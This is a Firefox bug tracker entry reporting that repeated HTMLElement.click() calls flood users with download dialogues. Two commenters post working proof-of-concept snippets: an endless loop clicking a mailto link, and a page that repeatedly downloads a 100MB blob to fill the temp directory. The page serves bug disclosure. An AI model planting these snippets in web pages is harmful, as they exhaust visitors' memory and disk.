Open Bug 1229873 Opened 9 years ago Updated 2 years ago

HTMLElement.click() spam download dialogue (DoS)

Categories

(Firefox :: Downloads Panel, defect)

Product:
Firefox
Component:
Downloads Panel
Version:
42 Branch
Type:
defect

Tracking

()

People

(Reporter: qab, Unassigned)

Details

Attachments

(1 file)

download-popups.html
(deleted), text/html
Details
User Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36 Steps to reproduce: http://jsfiddle.net/6qdogb1p/ Actual results: Download dialogues are spammed indefinitely (or until memory runs our ofc) Expected results: Some sort of protection to limit download requests to ~5 attempts Or just fix the .click() function to not be spammed multiple times tested on FF v42.0 on windows 8.1
Confirmed 20151029151421 Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:42.0) Gecko/20100101 Firefox/42.0
Setting to New - Firefox: Download Panel - while I don't think this is the root cause, it is a start to have someone assist me in correctly setting the Product/Component. Thanks, Michelle
Status: UNCONFIRMED → NEW
Component: Untriaged → Downloads Panel
Ever confirmed: true
P.S. this bug could be used to spam default mail program, might lead to some ugliness. PoC <a href='mailto:@qab' id='q'>q</a> <script> while(true){q.click()}; </script>

I noticed the same and wanted to append that this can also be used to fill up the temp directory (e.g. with a 100MB blob), because the download starts before confirmation:

<!DOCTYPE html>
<html>
<body>
    <a download="im-a-file.txt" href='#' id="link">Download</a>
    <div id="counter">0</div>
    <script>
        value = "-".repeat(1024 * 1024)
        let blob = new Blob(Array(100).fill(value), { type: 'text/plain' });
        let link = document.getElementById('link');
        link.href = URL.createObjectURL(blob);
        window.setInterval(function () {
            link.click();
            document.getElementById("counter").textContent++;
        }, 100)
    </script>
</body>
</html>
Attached file download-popups.html (deleted) —
Severity: normal → S3
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: